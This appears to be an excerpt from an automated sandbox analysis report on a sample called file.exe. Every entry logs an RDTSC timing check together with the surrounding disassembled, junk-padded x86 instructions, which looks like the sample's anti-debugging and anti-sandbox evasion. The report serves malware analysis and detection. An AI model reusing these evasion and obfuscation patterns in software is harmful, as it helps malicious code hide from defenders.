Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B610BE second address: B61116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push 00000000h 0x00000008 push edi 0x00000009 call 00007F35AD45B558h 0x0000000e pop edi 0x0000000f mov dword ptr [esp+04h], edi 0x00000013 add dword ptr [esp+04h], 0000001Ah 0x0000001b inc edi 0x0000001c push edi 0x0000001d ret 0x0000001e pop edi 0x0000001f ret 0x00000020 jne 00007F35AD45B55Bh 0x00000026 push 00000003h 0x00000028 sub dword ptr [ebp+122D30A3h], eax 0x0000002e push 00000000h 0x00000030 or dword ptr [ebp+122D2470h], edx 0x00000036 push 00000003h 0x00000038 call 00007F35AD45B559h 0x0000003d pushad 0x0000003e pushad 0x0000003f jg 00007F35AD45B556h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B61116 second address: B6111E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6111E second address: B6112A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6112A second address: B6112E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6112E second address: B61138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B61138 second address: B61169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F35AD0C7245h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F35AD0C723Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B61169 second address: B6116F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B6116F second address: B61179 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F35AD0C7236h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B61179 second address: B611FC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F35AD45B55Fh 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F35AD45B558h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c add ecx, 104077FFh 0x00000032 lea ebx, dword ptr [ebp+12457EA4h] 0x00000038 sbb esi, 38A31DE9h 0x0000003e xchg eax, ebx 0x0000003f jo 00007F35AD45B56Dh 0x00000045 pushad 0x00000046 jmp 00007F35AD45B55Fh 0x0000004b jo 00007F35AD45B556h 0x00000051 popad 0x00000052 push eax 0x00000053 pushad 0x00000054 push edi 0x00000055 jmp 00007F35AD45B560h 0x0000005a pop edi 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B611FC second address: B61200 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B61300 second address: B6134E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F35AD45B558h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push edi 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edi 0x00000016 mov eax, dword ptr [eax] 0x00000018 jnc 00007F35AD45B56Ch 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 pushad 0x00000023 jmp 00007F35AD45B55Fh 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B613B9 second address: B613DC instructions: 0x00000000 rdtsc 0x00000002 je 00007F35AD0C7244h 0x00000008 jmp 00007F35AD0C723Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F35AD0C7238h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: B613DC second address: B61475 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F35AD45B55Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D31D2h], esi 0x00000011 push 00000000h 0x00000013 add dword ptr [ebp+122D2630h], ebx 0x00000019 push 26D14DBAh 0x0000001e jmp 00007F35AD45B563h 0x00000023 xor dword ptr [esp], 26D14D3Ah 0x0000002a pushad 0x0000002b adc edi, 1E097366h 0x00000031 mov dx, 74B7h 0x00000035 popad 0x00000036 add dword ptr [ebp+122D1930h], edi 0x0000003c push 00000003h 0x0000003e mov di, 08A1h 0x00000042 or dword ptr [ebp+122D3062h], esi 0x00000048 push 00000000h 0x0000004a and edi, dword ptr [ebp+122D1CF1h] 0x00000050 pushad 0x00000051 push ecx 0x00000052 call 00007F35AD45B566h 0x00000057 pop edx 0x00000058 pop edi 0x00000059 or ax, AAEEh 0x0000005e popad 0x0000005f push 00000003h 0x00000061 jmp 00007F35AD45B55Ah 0x00000066 push FE1992C0h 0x0000006b pushad 0x0000006c push edi 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61475 second address: B614B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F35AD0C7242h 0x0000000b popad 0x0000000c xor dword ptr [esp], 3E1992C0h 0x00000013 jmp 00007F35AD0C723Ch 0x00000018 lea ebx, dword ptr [ebp+12457EB8h] 0x0000001e or dword ptr [ebp+122D248Bh], ecx 0x00000024 xchg eax, ebx 0x00000025 push edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jns 00007F35AD0C7236h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B614B6 second address: B614DB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F35AD45B567h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73E97 second address: B73E9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73E9B second address: B73EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54EB7 second address: B54EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7FFCF second address: B7FFF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD45B55Eh 0x00000007 jg 00007F35AD45B556h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 push esi 0x00000011 jns 00007F35AD45B55Ch 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8014B second address: B80151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80151 second address: B80156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80156 second address: B8016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD0C7245h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8016F second address: B80185 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jo 00007F35AD45B556h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802B4 second address: B802BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802BA second address: B802BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802BF second address: B802C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802C4 second address: B802E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F35AD45B55Ch 0x00000011 jg 00007F35AD45B556h 0x00000017 jng 00007F35AD45B55Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802E3 second address: B802E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802E7 second address: B802EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802EE second address: B802F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B802F9 second address: B802FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B808B3 second address: B808B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80A0B second address: B80A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80A11 second address: B80A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80A19 second address: B80A2C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD45B55Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80E56 second address: B80E60 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F35AD0C7236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80E60 second address: B80E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007F35AD45B565h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80FF1 second address: B81008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7243h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81008 second address: B81010 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81010 second address: B81016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81611 second address: B81617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81774 second address: B81778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81778 second address: B8177E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81A5B second address: B81A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7244h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81A73 second address: B81A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81A7B second address: B81ABB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7245h 0x00000007 jmp 00007F35AD0C7247h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnp 00007F35AD0C725Dh 0x00000016 js 00007F35AD0C7242h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81ABB second address: B81AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DAA second address: B81DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DB2 second address: B81DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B81DB8 second address: B81DCC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7240h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B58415 second address: B5841A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87C7E second address: B87C8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87C8A second address: B87C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B87C8E second address: B87C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B869EA second address: B869EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B869EE second address: B86A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F35AD0C7242h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B86A0A second address: B86A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD45B567h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B871E6 second address: B87202 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F35AD0C7236h 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jnp 00007F35AD0C7240h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4C93C second address: B4C940 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E3B3 second address: B4E3BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E3BF second address: B4E3C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CD1B second address: B8CD21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CD21 second address: B8CD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE5B second address: B8CE61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE61 second address: B8CE71 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F35AD45B55Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE71 second address: B8CE8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F35AD0C7245h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CE8A second address: B8CE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D001 second address: B8D017 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F35AD0C7236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007F35AD0C723Ch 0x00000010 jo 00007F35AD0C7236h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D625 second address: B8D629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8D629 second address: B8D631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F39B second address: B8F3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F35AD45B55Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F3A9 second address: B8F3B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F35AD0C7254h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F3B9 second address: B8F3BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8F7D0 second address: B8F7DF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8FC76 second address: B8FC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9025C second address: B90260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90260 second address: B9026A instructions: 0x00000000 rdtsc 0x00000002 ja 00007F35AD45B556h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9026A second address: B9028C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F35AD0C7244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F35AD0C7236h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B904DD second address: B904E3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90751 second address: B90757 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90757 second address: B9075B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B907DF second address: B90806 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F35AD0C724Ah 0x00000013 jmp 00007F35AD0C7244h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B90806 second address: B9080B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91728 second address: B9172C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9172C second address: B91739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91739 second address: B91744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F35AD0C7236h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B91744 second address: B9174A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95234 second address: B95281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F35AD0C7236h 0x0000000a popad 0x0000000b nop 0x0000000c adc si, 23D9h 0x00000011 push 00000000h 0x00000013 jmp 00007F35AD0C723Dh 0x00000018 push 00000000h 0x0000001a je 00007F35AD0C723Eh 0x00000020 pushad 0x00000021 clc 0x00000022 mov eax, 74BFB4E1h 0x00000027 popad 0x00000028 movsx esi, dx 0x0000002b xchg eax, ebx 0x0000002c pushad 0x0000002d pushad 0x0000002e jmp 00007F35AD0C7245h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95281 second address: B9528A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B96920 second address: B9692B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F35AD0C7236h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9739A second address: B973A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED32 second address: B9ED37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9ED37 second address: B9ED47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F35AD45B55Ch 0x00000009 rdtsc
